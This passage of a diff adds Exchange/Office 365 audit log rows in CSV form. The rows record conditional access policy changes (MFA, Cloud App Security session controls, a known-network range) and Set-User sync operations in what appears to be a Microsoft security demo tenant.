+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:04:02.8334473Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T06:31:46Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T19:29:43Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-16T21:23:49Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T21:23:49Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T10:12:00Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T07:05:56Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-22T00:29:52Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T05:33:08Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T04:54:27Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T04:54:26Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:58Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T04:54:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 4:54:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:22Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
